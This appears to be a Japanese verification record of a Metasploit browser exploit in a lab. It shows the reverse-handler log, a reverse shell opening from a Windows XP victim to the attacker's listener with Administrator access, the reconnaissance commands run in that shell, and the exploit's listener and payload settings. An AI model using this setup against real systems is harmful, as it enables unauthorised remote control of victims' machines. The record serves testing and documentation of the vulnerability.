[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.40:8888 ...
*****useragent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CL 1.1.4322)
[*] HTTP Client connected from 192.168.1.100:1044 using Windows XP, sending paylad...
[*] Got connection from 192.168.1.40:4321 <-> 192.168.1.100:1045
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\デスクトップ>whoami
whoami
VICTIM\Administrator
C:\Documents and Settings\Administrator\デスクトップ>hostname
hostname
victim
C:\Documents and Settings\Administrator\デスクトップ>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ローカル エリア接続:
Connection-specific DNS Suffix . : not-defined
IP Address. . . . . . . . . . . . : 192.168.1.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\Documents and Settings\Administrator\デスクトップ>
今回のExploitはMetasploitを使用しました。 この検証記録に使用した設定内容は以下の通りです。
Exploit and Payload Options =========================== Exploit: Name Default Description -------- -------- ------------ ---------------------------- optional HTTPHOST 192.168.1.40 The local HTTP listener host required HTTPPORT 8888 The local HTTP listener port Payload: Name Default Description -------- -------- ------------ ------------------------------------------ required EXITFUNC seh Exit technique: "process", "thread", "seh" required LHOST 192.168.1.40 Local address to receive connection required LPORT 4321 Local port to receive connection Target: Automatic - Windows 2000, Windows XP